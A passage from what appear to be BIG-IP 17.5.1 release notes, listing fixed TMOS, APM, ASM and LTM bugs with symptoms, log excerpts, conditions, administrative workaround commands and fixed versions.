01070734:3: Configuration error: In url-filter (/Common/<filter>), allowed-category () does not exist. In url-filter (/Common/<filter>), allowed-category () does not exist.
Unexpected Error: Loading configuration process failed.

Workaround:
Edit the respective categories before upgrading to the latest version.

1. Edit bigip.conf
2. Look for the respective failure filter name and change the
Lesser_Known_Religions to Lesser-Known_Religions and
Widely_Known_Religions to Widely-Known_Religions
3. Save the file
4. Update the configuration using tmsh save/load sys config

Fix:
Corrected category names in the configuration to address upgrade failures from older versions to 17.5.x caused by mismatches. The handling is implemented in the fixup script, which is triggered when a URL Filter is configured.

Fixed Versions:
17.5.1

1922525-1 : BIG-IP SCP hardening

Component: TMOS

Symptoms:
Under certain conditions SCP does not follow current best practices.

Conditions:
- Authenticated high-privilege user
- SCP file transfer

Impact:
BIG-IP does not follow best practices for scp operations

Workaround:
N/A

Fix:
The SCP file transfer in BIG-IP now follows current best practices.

Fixed Versions:
17.5.1

1922501-1 : TMM crash loop due to missing kernel driver★

Links to More Info: BT1922501

Component: TMOS

Symptoms:
TMM goes into a crash loop with following logs in 'tmm' logs

notice EAL: Driver cannot attach the device (<VMBus-ID>)
notice EAL: Failed to attach device on primary process
notice dpdk[<VMBus-ID>]: Error: rte_dev_probe failed: err=-95
notice xnet_lib [vmbus:eth2]: Error: Failed to initialize driver
notice xnet[00:e2.0]: Error: Unable to attach to xnet dev


This is due to missing uio_hv_generic kernel module which gets removed on TMM shutdown but fails to be re-inserted upon TMM post-crash restart.

Conditions:
1) BIG-IP on HyperV or Azure
2) Using xnet-DPDK driver
3) TMM crashes due to any other reason and restarts; can not repro directly using 'bigstart restart tmm' unless a 'bigstart restart' also reproduces the initial crash as well

Impact:
Traffic disrupted while tmm restarts.

Workaround:
(A)
1) Add 'modprobe uio_hv_generic' to '/usr/lib/bigstart/functions'
This will likely require remounting /usr to allow writing; this can be done via
  sudo mount -o remount,rw /usr

2) Within 'functions', search for 'vadc_restore_vmbus_nics()' and add 'modprobe uio_hv_generic' to bottom of function after 'done'

3) Afterwards, restart TMM with 'bigstart restart tmm'

(B)
1) Switch to 'sock' driver by adding following config

[root@BIGIP:Active:Standalone] config # cat /config/tmm_init.tcl
device driver vendor_dev f5f5:f550 sock

[root@BIGIP:Active:Standalone] config #

2) Restart TMM with 'bigstart restart tmm'

Fix:
Re-activate missing module after TMM crash

Fixed Versions:
17.5.1

1920341-1 : SSH Public Key authentication allows RSA and not ECDSA in ccmode

Links to More Info: BT1920341

Component: TMOS

Symptoms:
When a device is in common criteria mode, you cannot use ecdsa-sha2-nistp256 or ecdsa-sha2-nistp384 for SSH public key authentication. Additionally, you can use rsa key which you should not be able to according to common criteria guidelines.

Conditions:
-- Common Criteria mode is enabled

Impact:
You cannot ssh with ECDSA but can with RSA key

Workaround:
Workaround is in file /config/ssh/sshd_config, on line 34 replace:
HostKey /config/ssh/ssh_host_rsa_key

with:
HostKey /config/ssh/ssh_host_ecdsa_key
HostKey /config/ssh/ssh_host_ecdsa_p384_key

Note that this workaround must be applied after each reboot in ccmode, since the sshd_config file will revert after reboot.

Fix:
SSH public key authentication works as expected in ccmode.

Fixed Versions:
17.5.1

1920057-1 : Bd crashes

Component: Application Security Manager

Symptoms:
Bd crashes

Conditions:
Running TMOS version of 17.5.0.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None

Fix:
The crash no longer occurs.

Fixed Versions:
17.5.1

1917741-2 : [APM][TMM] memory growth in SAML SP while decoding assertion attributes

Links to More Info: BT1917741

Component: Access Policy Manager

Symptoms:
Tmm crashes due to out of memory while passing SAML traffic

Conditions:
-- SAML SP configured with assertion attributes.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1

1881373-2 : CVE-2024-3661 Tunnelvision Vulnerability

Links to More Info: K000139553, BT1881373

1880365-1 : Cannot log into Fs_v2 Azure BIG-IP with >= 32 vCPUs and >= 5 interfaces

Links to More Info: BT1880365

Component: TMOS

Symptoms:
No login prompt is available to access Azure Fs_v2 instances when attaching 5 or more instances. 8 is the max number of interfaces for F32_v2 or larger.

Conditions:
-- Use Azure F32_v2 instance size or larger.
-- Attach 5 or more interfaces to BIG-IP.

Impact:
No access to F32_v2 instances or larger when attaching 5 or more interfaces.

Workaround:
None

Fix:
Login prompt is available.

Fixed Versions:
17.5.1

1857413-2 : Malformed XML data or Malformed JSON data violation raised despite URL containing content-profile

Links to More Info: BT1857413

Component: Application Security Manager

Symptoms:
* XML/JSON traffic gets flagged or blocked with a Malformed XML data or Malformed JSON data violation despite the URL having a content-profile associated with it.

* When the violation gets raised, the violation details lists the profile as "N/A".

* The XML/JSON content profiles are visible when viewing the content profile configuration via WebUI. However, corresponding database tables lose integrity, which results false positive.

Conditions:
Any change followed by 'Apply Policy' on a policy can ruin the integrity of corresponding database that might affect other policies, and false positive would start after subsequent 'Apply Policy' or global configuration update.

Impact:
XML/JSON traffic gets flagged or, if enforced, blocked despite the content profile associated to the URL.

Workaround:
Make a spurious policy change to the affected XML or JSON profile (e.g., updating its Description), followed by applying policy changes via 'Apply Policy,'

This helps resolve the issue by populating a new entry in the database table for this policy.

Avoid making any change on any GraphQL profile to prevent it from re-occurring.

Fix:
Configuration change will not ruin the integrity of the database tables.

Fixed Versions:
17.5.1

1856449-1 : [keymgmtd]OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.

Links to More Info: BT1856449

Component: TMOS

Symptoms:
You may observe below logs in /var/log/ltm

err keymgmtd[31381]: OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.
err fips_monitor[18007]: 01da0011:3: SelfTest/Integrity test failure detected, triggering reboot action

Conditions:
Conditions are unknown

Impact:
Unexpected reboot causing disruption to traffic and failover.

Workaround:
None

Fixed Versions:
17.5.1.1

1856289-2 : Virtual server, which is managed by remote LTM device, is shown as "offline/enabled" with "Monitor /Common/bigip : no reply from big3d: timed out" message (red diamond icon).

Links to More Info: BT1856289

Component: Global Traffic Manager (DNS)

Symptoms:
When a virtual server object, which is managed by a remote LTM device, is disabled, after gtmd is restarted (or GTM/DNS device reboot) and gtmd becomes online and iQuery communication is re-established with the remote LTM device, the bellow message is logged to /var/log/gtm and virtual server status becomes "offline/disabled" (black diamond icon).

gtmd[xxxx]: 011ae0f2:1: Monitor instance /Common/bigip 10.1.1.201:80 CHECKING --> DOWN from /Common/bigipdns (no reply from big3d: timed out)
gtmd[xxxx]: 011a6006:1: SNMP_TRAP: virtual server /Common/vs1 (ip:port=10.1.1.201:80) (Server /Common/bigipltm) state change blue --> red ( Monitor /Common/bigip : no reply from big3d: timed out: disabled directly)

Then, even after re-enabling the virtual server, which is managed by LTM, virtual server stays as "offline/enabled" (red diamond icon) with "Monitor /Common/bigip : no reply from big3d: timed out" message.

  ----------------------------------
  | Gtm::Virtual Server: vs1
  ----------------------------------
  | Status
  | Availability : offline
  | State : enabled
  | Reason : Monitor /Common/bigip : no reply from big3d: timed out
  | Destination : 10.1.1.201:80
  | Up Time : ---

Conditions:
All of the following conditions met.

- GTM/DNS device manages remote LTM device and its virtual server.
- Remote LTM virtual server is not directly monitored by GTM/DNS device monitor object. Instead, remote LTM virtual server is monitored by remote LTM device itself (e.g., on remote LTM device, virtual server pool is monitored by pool monitor).
- On GTM/DNS device, disable and re-enable virtual server, which is managed by remote LTM device.
- After virtual server is disabled on GTM/DNS device, gtmd restart on GTM/DNS device or GTM/DNS device reboots.
- GTM/DNS is running on a software versions 17.1.1 or 16.1.5 or later versions in which the ID 1133201 is fixed.

Impact:
Virtual server stays as unavailable despite the remote LTM device reporting virtual server status as 'up'. Hence, pool or wideIP, which uses the affected server object, may be unavailable too.

Workaround:
If issue had already occurred and virtual server stayed as "offline/enabled" (red diamond icon), restarting gtmd on GTM/DNS device will rescue the affected virtual server.

If issue does not yet occur but virtual server is going to be disabled and re-enabled, you can prevent issue by changing "DNS >> Settings : GSLB : General - Monitor Disabled Objects" setting (gtm global-settings general monitor-disabled-objects) to "yes" (default "no"). This needs to be done prior to disabling virtual server (prior to gtmd restart/reboot).

# tmsh modify gtm global-settings general monitor-disabled-objects yes
# tmsh save sys config gtm-only

Fixed Versions:
17.5.1

1853721-3 : User has reached maximum active login tokens

Links to More Info: BT1853721

Component: TMOS

Symptoms:
You are unable to create any new tokens for a user.

Conditions:
To reproduce the issue, create 100 active tokens for non admin user and reboot device

-- 100 active tokens already exist for a non-admin user
-- The system is rebooted

Impact:
You are unable to create any new tokens for the user.

An error is reported: "User has reached maximum active login tokens"

Workaround:
Execute below command
 restcurl -X DELETE /shared/authz/tokens

Fixed Versions:
17.5.1.1

1826393-4 : TMM may restart when handling undisclosed traffic handled by IPS

Component: Traffic Classification Engine

Symptoms:
tmm crashes and restarts due to memory pressure

Conditions:
IPS configured on virtual.

Impact:
TMM restarts - traffic interruption.

Workaround:
N/A

Fix:
The undisclosed traffic scenario no longer causes TMM to restart.

Fixed Versions:
17.5.1

1826185-2 : Tenants on r2000 and r4000 series may drop packets larger than 9194 bytes

Links to More Info: BT1826185

Component: Local Traffic Manager

Symptoms:
F5OS tenants have a supported maximum MTU of 9198 bytes as per K6399. Tenants running on 2000 and r4000 series may drop packets larger than 9194 bytes.

The tmm/xnet/iavf/per_vf_stats.rx_discards stat increments when this occurrs.

Conditions:
R2000 or r4000 platform.
Jumbo frames

Impact:
Dropped jumbo frames

Workaround:
Lower the MTU such that packets are not exceeding 9194 bytes.

Fixed Versions:
17.5.1.1

1826013-1 : BIG-IP as Oauth C/RS "Invalid json error" after upgrade to 17.1.2.1 when json response has non ASCII characters★

Links to More Info: K000150397, BT1826013

Component: Access Policy Manager

Symptoms:
OAuth authentication fails with error error: Invalid json on oauth client/RS

Conditions:
OAuth client/RS receives JWT token which contains non-ASCII characters

Impact:
OAuth authentication fails

Workaround:
None

Fix:
17.1.2.1 code has libjson:isvalid() to check if the json is valid or not. this function cannot validate non ASCII characters and returns error. removed this function and added logic to check if valid json is received or not.

Fixed Versions:
17.5.1.1

1825949-2 : [APM][Radius] Message-Authenticator value is incorrect for OTP request

Links to More Info: BT1825949

Component: Access Policy Manager

Symptoms:
When a OTP challenge is requested on RSA, the Message-Authenticator value in the second request is not corrected/alarmed by the RSA server.

Eventually the packet is dropped at the Radius Server.

Conditions:
The Message-Authenticator attribute radius.messageauthenticator is set to true.

Impact:
This causes authentication failures, disrupting the user’s access control process.

Workaround:
None

Fixed Versions:
17.5.1

1825513 : ClientSSL profile with PQC group may cause TMM to crash

Links to More Info: BT1825513

Component: Local Traffic Manager

Symptoms:
TMM or system services may restart unexpectedly due to memory pressure.

In /var/log/tmm:

warning tmm[24255]: 01260013:4: SSL Handshake failed for TCP 10.20.2.115:44404 -> 10.20.40.191:443
err tmm[24255]: 01230140:3: RST sent from 10.20.40.191:443 to 10.20.2.115:44404, [0x3076761:2571] SSL handshake timeout exceeded
err tmm3[24255]: 01010282:3: Crypto codec error: sw_crypto-3 RSA private encrypt error OpenSSL error:03078069:bignum routines:BN_EXPAND_INTERNAL:expand on static bignum data
err tmm2[24255]: 01010282:3: Per-invocation log rate exceeded; throttling.
 err tmm6[24255]: 01010282:3: Resuming log processing at this invocation; held 53 messages.

Conditions:
Cipher rule DH group X25519KYBER768 is enabled.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
There is no workaround, disable X25519KYBER768 to mitigate the issue.

Fix:
Fix memory issues.

Fixed Versions:
17.5.1

1825449-2 : Citrix Optimal Gateway Routing is not showing login username of session

Links to More Info: BT1825449

Component: Access Policy Manager

Symptoms:
When an iRule-based solution for optimal gateway routing is used for Citrix VDI, the currently logged-in username will not be displayed on the GUI session details page.

Conditions:
- APM Citrix VDI OGR is implemented with an iRule workaround.
- When the user checks the last logged-in username in the GUI.

Impact:
Username column displays empty instead of username.

Workaround:
None

Fix:
The Username column should display the name of the user currently logged in for the session.

Fixed Versions:
17.5.1

1825241-4 : MCPD validation fails when non-existent cipher group is referenced by SSL profile

Links to More Info: BT1825241

Component: Local Traffic Manager

Symptoms:
When using "tmsh load sys config verify" or performing an MCPD forceload/reboot, no validation error is reported for a SSL profile referencing a non-existent cipher group. This is unexpected behavior.

However, when using "tmsh load sys config", the system correctly identifies and reports the missing cipher group as a validation error. This is the expected behavior.

Conditions:
The disk config file (/config/bigip.conf) is missing the cipher group configuration, while that cipher group continues to be referenced within a SSL profile.

Impact:
When a SSL profile references a non-existent cipher group, the configuration loads without validation errors under certain conditions. This can result in connection failures with error messages such as:

     Connection error: hud_ssl_handler:1315: alert(40) invalid profile unknown on VIP <VIP_NAME>

Workaround:
Ensure the disk config file (/config/bigip.conf) always has the cipher group present if it is being referenced by a Client or Server SSL profile.

Fixed Versions:
17.5.1

1821373-2 : SAML Assertion Handling issue in APM SSO

Component: Access Policy Manager

Symptoms:
When attributes with large encrypted values are present, the allocated memory may not be appropriately resized, leading to unexpected behavior.

Conditions:
This occurs specifically under configurations that utilize SAML with encrypted attributes containing large values.

Impact:
TMM core, partial traffic disruption

Workaround:
NA

Fix:
SAML Assertion Handling issue in APM SSO has been addressed.

Fixed Versions:
17.5.1

1821033-2 : Assertion "packet must already have an ethernet header" when using tcpdump

Links to More Info: BT1821033

Component: Local Traffic Manager

Symptoms:
Tmm crashes when running tcpdump.

Conditions:
1. A virtual server references another virtual server with an iRule
2. The destination virtual server has an iRule with reject inside FLOW_INIT
3. Use tcpdump while hitting the reject rule

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Use either remote tcpdump or avoid using reject rule in FLOW_INIT.

Fix:
Tmm no longer crashes in this scenario.

Fixed Versions:
17.5.1

1819813-2 : [APM][NTLM]TMM core on null _ntlm_msg on 17.1.x on top of ID1495381

Links to More Info: BT1819813

Component: Access Policy Manager

Symptoms:
Tmm cores while APM looks up a session.

Conditions:
SWG explicit forward proxy with NTLM or Kerberos credentials identification method.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1.1

1819777-4 : In-tmm TCP monitor with no RCV and RCVdisable string might lead to a crash

Links to More Info: BT1819777

Component: In-tmm monitors

Symptoms:
In-tmm TCP monitor with no RCV and RCVdisable string might lead to a crash.

Conditions:
This happens when TCP in-tmm monitor is configured without any matching disable/enable string

ltm monitor tcp TCP {
    adaptive disabled
    defaults-from tcp
    interval 5
    ip-dscp 0
    recv none <<<< !
    recv-disable none <<<< !
    send "GET /check HTTP/1.0＼r＼n＼r＼n"
    time-until-up 0
    timeout 16
}

Bigd monitoring is not affected.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
- Disable in-tmm monitoring.
- OR, configure in-tmm TCP monitor with any string match.

Fixed Versions:
17.5.1

1818461-2 : [APM][VPN][WIN] Tunnel can't be established if endpoint inspection is Skipped. Machine Hash is not maching★

Links to More Info: BT1818461

Component: Access Policy Manager

Symptoms:
Because of selecting Skip Inspection button during EPI launch, it leads to in-correct machine hash and VPN connection is failed with below errors.

err tmm1[18549]: 01230140:3: RST sent from 10.103.xx.xx:443 to 10.103.xx.xx:64086, [0x2ff9084:34740] Machine Hash is not Valid

tmm1[18549]: 01230140:3: RST sent from 10.103.xx.xx:443 to 10.103.xx.xx:64123, [0x2ff9084:4239] Access encountered an error (Operation not supported)

Conditions:
-- Endpoint inspection is enabled in access policy, add Advanced resources assignment for fallback branch and end with allow
-- Launch endpoint inspection, select Skip Inspection instead of Start Inspection

If you are upgrading, this can be encountered after upgrading to version 17.1.2 and APM client (7250 or 7251).

Impact:
TCP connection reset is encountered and VPN connection fails.

Workaround:
Instead of Skip Inspection, select Start Inspection

(Or)
Don't configure any EPI check in Access policy

Fixed Versions:
17.5.1

1814821-3 : DHE groups present in profile's cipherlist with TLS1.3 enabled and tmm.ssl.useffdhe set to false simultaneously

Links to More Info: BT1814821

Component: Local Traffic Manager

Symptoms:
You might observe CRIT-level logs of configuration issues in the TMM logs but there is no impact to the traffic. Example log message:

crit tmm4[17746]: 01260000:2: Profile /Common/serverssl-secure: DHE groups present in profile's cipherlist with TLS1.3 enabled and tmm.ssl.useffdhe set to false simultaneously.

Conditions:
1. The db variable tmm.ssl.useffdhe set to false
2. Virtual server configured to use DH groups

Impact:
Crit-level logs are logged to /var/log/tmm

Workaround:
Leave the tmm.ssl.useffdhe value to default which is true

Fixed Versions:
17.5.1

1814477-1 : AWS Performance Drop from BIG-IP v17.1.2.1 to v17.5.0

Links to More Info: BT1814477

Component: Performance

Symptoms:
A FastL4 throughput drop occurs when updating to BIG-IP version 17.5.0.

Conditions:
-- Using AWS BIG-IP v17.5.0

Impact:
Throughput is lower compared to v17.1.2.1.

Workaround:
None

Fix:
Performance is improved in v17.5.0 compared to v17.1.2.1.

Fixed Versions:
17.5.1

1813841-1 : Password Caching setting is not applied

Links to More Info: BT1813841

Component: Access Policy Manager

Symptoms:
In the Connectivity profile, "F5 Access for Mac OS" is removed and updated on "Desktop Client Settings".

The Allow password caching functionality which was used to work with "F5 Access for Mac OS" is not working after updating the UI to "Desktop Client Settings".

Conditions:
Allow Password Caching is enabled on BIG-IP UI for Mac F5 Access.

Impact:
Users will be prompted to password page even after Allow Password caching is enabled.

Workaround:
Enable the Allow password caching via TMSH:
 
For Memory Option to Enable on Allow Password Caching:
 
modify apm profile connectivity Connectivity_profile client-policy modify { Connectivity_profile_clientPolicy { macos-ec { save-password true save-password-method memory save-password-timeout 10 } } }
 
 
For Disk option to Enable on Allow Password Caching:

modify apm profile connectivity Connectivity_profile client-policy modify { Connectivity_profile_clientPolicy { macos-ec { save-password true save-password-method disk } } }

Fixed Versions:
17.5.1

1813209-1 : Password Cache Expiration field is hidden in Connectivity profile

Links to More Info: BT1813209

Component: Access Policy Manager

Symptoms:
Password Cache Expiration field is hidden in Connectivity profile under Desktop Client Settings

Conditions:
1. Access-> Connectivity/VPN -> Profiles ->add/edit
2. Desktop Client Settings -> enable "Allow Password Caching"
3. Select "memory" as the "Save Password Method"

Impact:
For Creating new Connectivity profile:
You will not be able to set Password Cache Expiration value and default value of 240 will be used

For Existing Connectivity Profile:
You will not be able to modify the Password Cache Expiration value (Existing value).
In case of upgrades the existing value will be used

Workaround:
To modify the Password Cache Expiration value run:

tmsh modify apm profile connectivity <profile_name> client-policy modify { <profile_name>_clientPolicy { ec { save-password-timeout <desired value> } } }

Fixed Versions:
17.5.1

1812201-4 : A specific unicode character issue a malformed json violation

Links to More Info: BT1812201

Component: Application Security Manager

Symptoms:
When JSON arrives with a specific character, a malformed json violation is issued.

Conditions:
A specific character arrives in a JSON payload

Impact:
A blocking violation occurs.

Workaround:
None

Fixed Versions:
17.5.1

1798961-2 : With CC/FIPS license installed, OpenSSL should raise fatal alert when client does not advertise EMS support

Links to More Info: BT1798961

Component: TMOS

Symptoms:
When FIPS license is installed, OpenSSL enforces Extended Master Secret (EMS) to its peer clients. If a legacy TLS/SSL client does not provide EMS in its ClientHello extension, OpenSSL server merely aborts the handshake without sending a Fatal Handshake Alert message to the client. As a result, the reason for handshake abort is not clear.

Conditions:
1. FIPS license is installed on the BIG-IP Device
2. HTTPD server running on the BIG-IP device is linked with libssl.{so, a}
3. An attempt is made to contact the WebUI from a legacy browser that did not have support for EMS (or alternatively, from a service that did not advertise EMS support)

Impact:
Absence of explicit log message results in some confusion as to what the error was when the handshake terminated.

Workaround:
None

Fix:
A log message indicating a Fatal Handshake Message alert will be added. Then, whenever a legacy TLS/SSL client failed to provide the Extended Master Secret in its ClientHello message to the BIG-IP device with FIPS license installed, an error will be logged as the handshake aborts. This will inform the user the reason for the handshake termination.

Fixed Versions:
17.5.1

1798601-4 : BD restart loop after upgrade on error in CONFIG_TYPE_ACCOUNT_CHARSET_TEMPLATES★

Links to More Info: BT1798601

Component: Application Security Manager

Symptoms:
After upgrade, bd goes into a restart loop. An error is logged to /var/log/bd.log:

ECARD_POLICY|NOTICE|Feb 01 21:35:01.061|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_INTERNAL_PARAMETERS res:[0]
ECARD_POLICY|NOTICE|Feb 01 21:35:01.061|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_ENFORCER_ACCOUNTS res:[0]
ECARD_POLICY|NOTICE|Feb 01 21:35:01.063|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_LANGUAGE_CHARSET res:[0]
ECARD_POLICY|NOTICE|Feb 01 21:35:01.067|21460|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_ACCOUNT_CHARSET_TEMPLATES res:[0]
BD_MISC|ERR |Feb 01 21:35:01.070|21460|temp_func.c:2296|CONFIG_TYPE_PROTOBUF_FILENAMES message had parsing error: could not parse protobuf message

Conditions:
There is a licensing change on a device, and there is a policy that does not have any JSON profiles that have metacharElementCheck enabled.

Impact:
BD restarts in a loop. Traffic disrupted while bd restarts.

Workaround:
Run the following SQL on an affected system(s).

UPDATE DCC.ACCOUNT_CHARSET_TEMPLATES AS target JOIN (SELECT policy_name_crc, charset FROM DCC.ACCOUNT_CHARSET_TEMPLATES WHERE charset_templ_id = 2) AS source ON (target.policy_name_crc = source.policy_name_crc AND target.charset = '') SET target.charset = source.charset;

Fixed Versions:
17.5.1.1

1796609-3 : [APM][VDI]TCL error when upgrading to 17.x: can't read "tmm_apm_feed_login": no such variable★

Links to More Info: BT1796609

Component: Access Policy Manager

Symptoms:
After upgrading from BIG-IP version 15 to version 17 you may get a RST due to the below TCL error when requesting some application URLs:

TCL error: /Common/_sys_APM_VDI_Helper <HTTP_RESPONSE_RELEASE> - can't read "tmm_apm_feed_login": no such variable while executing "if { ($tmm_apm_client_type == "rdg-http" || $tmm_apm_feed_login) && $tmm_apm_is_nego_auth } { # Getting response header fo..."

Conditions:
-- VDI profile is attached
-- iRules are attached with custom priorities

Impact:
TCL errors observed in the LTM logs leading to connection reset

Workaround:
None

Fixed Versions:
17.5.1, 16.1.6

1789529-3 : A crash of the bd daemon

Links to More Info: BT1789529

Component: Application Security Manager

Symptoms:
A crash happens on specific xml payloads

Conditions:
Very specific circumstances related to specific policy and traffic.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None

Fix:
A crash related to the XML parser was fixed.

Fixed Versions:
17.5.1

1789501-3 : [APM][Standard Customisation]Webtop is blank after upgrading APM version 17.1.2 with Edge Browser in Compatibility mode.★

Links to More Info: BT1789501

Component: Access Policy Manager

Symptoms:
The Webtop is blank, does not display any resources.

Conditions:
The issue occurs when all of the following conditions are met.

-Using Microsoft Edge browser in compatibility mode (IE mode)
-Access Profile is using standard customisation
-BIG-IP Version 17.1.2 or later, 16.1.5 or later (version with fix of ID504374)

Impact:
Unable to use legacy applications in Microsoft Edge's IE compatibility mode

Workaround:
Use modern customization for access profile.

Fixed Versions:
17.5.1

1789477-4 : Orphaned tmsh processes might eventually lead to an out-of-memory condition

Links to More Info: BT1789477

Component: TMOS

Symptoms:
Occasionally, tmsh processes are orphaned when a user connects to the BIG-IP system via SSH, runs commands, and then quits the session or disconnects.

An orphaned tmsh process will have a parent pid (PPID) of 1. You can check for orphaned tmsh processes using the following shell command:

/bin/ps -o pid,ppid,comm -C tmsh
PID PPID COMMAND
8255 1 tmsh

If this issue occurs often enough, it might cause the BIG-IP system to run out of memory.

Conditions:
-- Using tmsh to connect to the BIG-IP system via SSH.
-- Running commands.
-- Quitting the session or disconnecting.

Impact:
Orphaned tmsh processes are created, which might eventually lead to an out-of-memory condition, if it occurs often enough.

Workaround:
There are several workarounds for this issue:

-- Change the default shell to bash for users that are going to use the script.
-- Use iControl.
-- Kill orphaned tmsh processes.

Fix:
Tmsh processes are no longer orphaned when a user connects to the BIG-IP system via SSH, runs commands, and then quits the session or disconnects under these conditions.

Fixed Versions:
17.5.1

1787621-2 : TMM may unexpectedly restart during IPsec tunnel negotiation

Links to More Info: BT1787621

Component: TMOS

Symptoms:
Tmm crashes while handling IPSec traffic

Conditions:
-- IPsec IKEv2 tunnel configured and in use
-- The IPsec attempts to establish a tunnel with the remote peer

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fix:
The TMM restart will not occur.

Fixed Versions:
17.5.1.1

1787153-2 : CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()

Links to More Info: BT1787153

1787149-2 : CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()

Links to More Info: K000153042

1786325-3 : Nxdomain stop blocking & nxdomain added into the allow list on rSeries

Links to More Info: BT1786325

Component: Advanced Firewall Manager

Symptoms:
Nxdomain domain eg:nxdomain.example.com is added into allow list. This causes tmctl nxdomain vector stats to not be accounted for, even when the client receives a response as nxdomain.

Conditions:
-- An nxdomain DoS vector is triggered
-- The nxdomain is later added to the allow list

Impact:
Tmctl stats for nxdomain vector is not accurate.

Workaround:
None

Fixed Versions:
17.5.1.1

1783217-1 : Rare bd crash

Links to More Info: BT1783217

Component: Application Security Manager

Symptoms:
A rare bd crash on some conditions related to json parsing

Conditions:
-- ASM provisioned, passing traffic
-- JSON parsing occurs

Impact:
ASM traffic disrupted while bd restarts.

Workaround:
None

Fixed Versions:
17.5.1.1

1783081-3 : Removing conditional freeing for m_oauth instances in tmm

Links to More Info: BT1783081

Component: Access Policy Manager

Symptoms:
Increase in TMM memory with M_OAUTH instances

Conditions:
M_OAUTH instances are freed based on conditional checks.

Impact:
Memory leak in TMM.

Workaround:
None

Fix:
Remove conditional freeing.

Fixed Versions:
17.5.1

1782365-3 : Importing a policy creates default 'password' sensitive parameter when it is not present in the exported policy in full JSON format

Links to More Info: BT1782365

Component: Application Security Manager

Symptoms:
Importing a policy creates a default 'password' sensitive parameter when it is not present in the exported policy in full JSON mode

Conditions:
-- Create a policy with API security template.
-- Delete the default "password" sensitive parameter.
-- Export the policy in full JSON format.
-- Import the policy again.

Impact:
Unexpected sensitive parameter appears in imported policy

Workaround:
None

Fix:
The policy is imported without sensitive parameters that do not appear in the full JSON policy

Fixed Versions:
17.5.1

1782113-3 : Parameter 'redirectwebauthn:i:0' is crashing the RDP file with 'The RDP File is corrupted' error message

Links to More Info: BT1782113

Component: Access Policy Manager

Symptoms:
Currently, with the below Custom Parameters
redirectclipboard:i:0
redirectprinters:i:0
redirectsmartcards:i:0
redirectwebauthn:i:0

The issue is when adding 'redirectwebauthn:i:0' to RDP Custom Parameters, the user gets RDP connection error when the user opens the downloaded RDP file. The ‘The RDP File is corrupted. The remote connection cannot be started’ message is displayed.

Conditions:
The parameter 'redirectwebauthn:i:0' is added to RDP Custom Parameters.

Impact:
Displays the below error message while opening the RDP file:
‘The RDP File is corrupted. The remote connection cannot be started’

Workaround:
Launch the RDP without the "redirectwebauthn:i:0" parameter.

Fixed Versions:
17.5.1

1773161-2 : BIG-IP APM 17.1.2 VPN tunnels failed to establish at "GET /isession" stage

Links to More Info: BT1773161

Component: Access Policy Manager

Symptoms:
Windows Edgeclient (any other client) stuck at Initialisation.

You may observe a lot of below logs in f5tunnelserver.txt

2024-12-15,12:32:26:530, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

2024-12-15,12:32:27:035, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

2024-12-15,12:32:27:541, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

2024-12-15,12:32:28:046, 19084,19088,, 48, , 970, CUTunnelServerX::isReady(), server response , result=0

Conditions:
-- BIG-IP version with fix of ID 903501
-- "sys db ipv6.enabled" is set to FALSE
-- Any client attempting to establish a VPN tunnel

Impact:
VPN fails to establish

Workaround:
1. "sys db ipv6.enabled" is set to TRUE

OR

2. Perform below two operations

a) Disable the DB variable isession.ctrl.apm:

 tmsh modify sys db isession.ctrl.apm value disable
 
b) Perform 'Apply Access Policy' for the access policy attached to the virtual server.

Fixed Versions:
17.5.1

1772377-3 : Libtiff CVE-2024-7006: NULL pointer dereference in tif_dirinfo.c

Links to More Info: K000152542

1771985-3 : [APM] OAuth AS max claims data support upto 8kb dynamically

Links to More Info: BT1771985

Component: Access Policy Manager

Symptoms:
The max claim data size is set to 8kb by default.

Conditions:
Oauth AS configured with multiple claims.

Impact:
The large claim size can lead to excessive memory consumption.

Workaround:
None

Fix:
Allocate the right amount of memory dynamically as required based on claims configuration

Fixed Versions:
17.5.1

1771945-2 : Memory leak when using event-wait with SSL SANs

Links to More Info: BT1771945

Component: Access Policy Manager

Symptoms:
- Memory usage continues to grow despite load.
- TMM Crash / HA Failover.

Conditions:
- Access policy with event-wait
- Rule contains [ACCESS::perflow get perflow.ssl.server_cert.subject_alt_name]

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1.1

1758181-2 : Optimal gateway routing issue with HTML5 client

Links to More Info: BT1758181

Component: Access Policy Manager

Symptoms:
When you configure APM VDI Citrix OGR using article https://community.f5.com/kb/technicalarticles/solution-for-citrix-optimal-gateway-routing/278727, the system fails to start ica connection to the backend desktop using HTML5 access.
Additionally, the iRule example is incorrect.

Conditions:
1. OGR is configured using https://community.f5.com/kb/technicalarticles/solution-for-citrix-optimal-gateway-routing/278727
2. Use HTML5 client access

Impact:
Could not connect to backend desktop using HTML5.

Workaround:
None

Fix:
It should connect to backend desktop using HTML5 along with native client.

Fixed Versions:
17.5.1

1758153-5 : Configuring a Data Guard URL longer than 1024 characters triggers a restart loop

Component: Application Security Manager

Symptoms:
Data Guard URLs are expected to be shorter than 1024 characters. If you configure a longer Data Guard URL, the configuration will cause the enforcer to crash and cause a restart loop.

Conditions:
A Data Guard URL longer than 1024 characters is configured and the policy is applied.

Impact:
The enforcer crashes and causes a restart loop.

Workaround:
Wildcards (*) should be utilized for any URL that is exceedingly long.

Fixed Versions:
17.5.1

1756825-4 : IPS Signatures not inspected being sometime after reboot

Component: Protocol Inspection

Symptoms:
After sudden or normal reboot, ipsd takes own time to bring respective ips profiles to Ready state. during this time traffic is not inspected for the signature traffic and passes through.

